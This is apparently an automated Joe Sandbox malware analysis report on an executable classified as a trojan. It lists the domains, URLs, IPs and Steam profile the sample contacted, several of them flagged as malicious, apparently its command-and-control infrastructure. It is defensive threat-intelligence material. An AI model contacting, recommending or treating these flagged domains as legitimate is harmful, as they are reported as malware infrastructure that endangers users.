    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | 0% | Virustotal | | Browse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi | 0% | Virustotal | | Browse
    https://steamcommunity.com/discussions/ | 0% | Virustotal | | Browse
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=e | 0% | Virustotal | | Browse
    bathdoomgaz.store | 22% | Virustotal | | Browse
    dissapoiznw.store | 22% | Virustotal | | Browse
    studennotediw.store | 18% | Virustotal | | Browse
    licendfilteo.site | 16% | Virustotal | | Browse
    clearancek.site | 18% | Virustotal | | Browse
    spirittunek.store | 22% | Virustotal | | Browse
    eaglepawnoy.store | 19% | Virustotal | | Browse
    mobbipenju.store | 22% | Virustotal | | Browse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a | 0% | Virustotal | | Browse
    https://sergei-esenin.com:443/api | 19% | Virustotal | | Browse
    https://steamcommunity.com/profiles/76561 | 0% | Virustotal | | Browse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA | 0% | Virustotal | | Browse
    https://www.cloudflare.com/5xx-error-landing | 0% | Virustotal | | Browse
    https://steamcommunity.com/workshop/ | 0% | Virustotal | | Browse
    https://sergei-esenin.com/api | 19% | Virustotal | | Browse
    https://steamcommunity.com/ | 0% | Virustotal | | Browse
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    steamcommunity.com | 104.102.49.254 | true | true | | unknown
    sergei-esenin.com | 104.21.53.8 | true | true | | unknown
    eaglepawnoy.store | unknown | unknown | true | | unknown
    bathdoomgaz.store | unknown | unknown | true | | unknown
    spirittunek.store | unknown | unknown | true | | unknown
    licendfilteo.site | unknown | unknown | true | | unknown
    studennotediw.store | unknown | unknown | true | | unknown
    mobbipenju.store | unknown | unknown | true | | unknown
    clearancek.site | unknown | unknown | true | | unknown
    dissapoiznw.store | unknown | unknown | true | | unknown

    Name | Malicious | Antivirus Detection | Reputation
    bathdoomgaz.store | true | | unknown
    studennotediw.store | true | | unknown
    clearancek.site | true | | unknown
    dissapoiznw.store | true | | unknown
    https://steamcommunity.com/profiles/76561199724331900 | true | URL Reputation: malware | unknown
    spirittunek.store | true | | unknown
    licendfilteo.site | true | | unknown
    eaglepawnoy.store | true | | unknown
    mobbipenju.store | true | | unknown
    https://sergei-esenin.com/api | true | | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://steamcommunity.com/my/wishlist/ | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://www.cloudflare.com/learning/access-management/phishing-attack/ | file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://steamcommunity.com:443/profiles/76561199724331900$ | file.exe, 00000000.00000002.2266194355.0000000001195000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://steamcommunity.com/?subsection=broadcasts | file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://help.steampowered.com/en/ | file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://steamcommunity.com/market/ | file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://store.steampowered.com/news/ | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://store.steampowered.com/subscriber_agreement/ | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://store.steampowered.com/subscriber_agreement/ | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.valvesoftware.com/legal.htm | file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://steamcommunity.com/discussions/ | file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://store.steampowered.com/stats/ | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://store.steampowered.com/steam_refunds/ | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=e | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi | file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://sergei-esenin.com/p; | file.exe, 00000000.00000003.2078215009.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
    https://steamcommunity.com/workshop/ | file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
      https://store.steampowered.com/legal/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://sergei-esenin.com/h;file.exe, 00000000.00000003.2078215009.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmptrue
        unknown
        https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://upx.sf.netAmcache.hve.4.drfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmptrue
        • URL Reputation: malware
        unknown
        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.cloudflare.com/learning/access-managfile.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.cloudflare.com/5xx-error-Xfile.exe, 00000000.00000002.2266194355.00000000011D1000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.2266194355.0000000001195000.00000004.00000020.00020000.00000000.sdmptrueunknown
            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://steamcommunity.com/profiles/76561file.exe, 00000000.00000002.2266194355.00000000011E6000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://store.steampowered.com/mobilefile.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://steamcommunity.com/file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://store.steampowered.com/about/file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmptrue
              • URL Reputation: malware
              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.53.8 | sergei-esenin.com | United States | 13335 | CLOUDFLARENETUS | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1532431
Start date and time:2024-10-13 06:53:14 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:file.exe
Detection:MAL
Classification:mal100.troj.evad.winEXE@2/5@10/2
EGA Information:Failed
HCA Information:Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92
• Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 7140 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
